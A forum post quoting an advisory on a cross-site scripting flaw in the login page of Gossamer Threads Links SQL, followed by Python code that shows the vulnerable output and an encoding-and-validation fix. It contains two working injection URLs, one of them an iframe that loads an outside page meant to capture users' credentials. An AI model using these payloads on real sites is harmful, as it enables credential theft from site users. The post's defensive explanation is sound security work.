Hello, is the following really a problem?
I didn't find anything in the forum.
It's from http://www.nessus.org
The URL variable in the Gossamer Threads Links SQL login page (user.cgi) is a hidden field in the login form and can be passed directly to user.cgi in the form of user.cgi?url="xyz". The URL variable is client side input created by the browser when a user clicks on a link which requires authentication. After authentication the user is redirected to the URL in the URL variable. This URL variable does not sufficiently validate the client side input and is therefore vulnerable to script injection and cross site scripting (XSS) attacks.
Exploit
This is a standard XSS vulnerability.
Note an attacker would normally obfuscate the linking code, but for these examples I have made it simple for the sake of understanding.
Simple Example 1 (Pop up)
/user.cgi?url="><script>alert("XSS Vulnerability")</script><"&from=rate
Resulting in the following within the HTML being injected:
<input type="hidden" name="url" value=""><script>alert("XSS Vulnerability")</script><"" />
Simple Example 2 (iframe to steal username and password)
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"%20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No"></iframe><!--&from=rate
regards
manne
http://www.edelsteine.de
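The advisory quoted above describes two distinct defects in how the hidden url field is handled: the value is written into an HTML attribute without encoding (so a double quote breaks out of the attribute, which is exactly what Example 1 shows), and it is later used as a post-login redirect target without being restricted to the site's own pages. The following Python example is added here to illustrate both; it is not code from Links SQL or from the advisory, and the function names, the sample payload and the "relative path only" redirect policy are assumptions made for the illustration.

```python
import html
from urllib.parse import urlsplit

# Constructed sample input, shaped like the advisory's Example 1 payload:
# the value arrives in the "url" query parameter and ends up in a hidden field.
SAMPLE_PAYLOAD = '"><script>alert("XSS Vulnerability")</script><"'


def render_hidden_field_vulnerable(url):
    """Reproduces the defect the advisory describes (illustration only):
    the parameter is interpolated straight into value="...", so a double
    quote in the input closes the attribute and the remainder is parsed
    as markup by the browser."""
    return '<input type="hidden" name="url" value="%s" />' % url


def render_hidden_field_fixed(url):
    """Hardened form: HTML-attribute encode the value before emitting it.
    html.escape(quote=True) rewrites " as &quot; and < > & as entities, so
    the browser keeps the entire string inside the attribute value."""
    return '<input type="hidden" name="url" value="%s" />' % html.escape(url, quote=True)


def is_safe_redirect_target(url):
    """Second layer: the value is later used as a redirect after login, so
    accept only a same-site relative path. Assumption for this example: the
    application only ever needs to send the user back to one of its own pages.
    Rejects empty values, absolute URLs, scheme-relative //host forms, and
    anything carrying markup or control characters."""
    if not url or not url.startswith('/') or url.startswith('//'):
        return False
    parts = urlsplit(url)
    if parts.scheme or parts.netloc:
        return False
    return not any(c in url for c in '<>"\'\r\n\x00')


def build_login_hidden_field(url, default='/'):
    """Combine both defences: fall back to a known-good default when the
    submitted target fails validation, then attribute-encode whatever is
    emitted. Encoding alone stops the injection; validation alone stops the
    open redirect; a login form wants both."""
    target = url if is_safe_redirect_target(url) else default
    return render_hidden_field_fixed(target)


if __name__ == '__main__':
    print('vulnerable :', render_hidden_field_vulnerable(SAMPLE_PAYLOAD))
    print('encoded    :', render_hidden_field_fixed(SAMPLE_PAYLOAD))
    print('validated  :', build_login_hidden_field(SAMPLE_PAYLOAD))
    print('legit      :', build_login_hidden_field('/user.cgi?from=rate'))
```

Running the block prints the vulnerable rendering, which is byte-for-byte the injected markup the advisory shows for Example 1, followed by the encoded rendering in which the script tags are inert text, and finally the validated form in which the payload never reaches the page at all because it is not a relative path. The Example 2 iframe payload is stopped the same way: it contains both a double quote and an absolute URL, so it fails both checks.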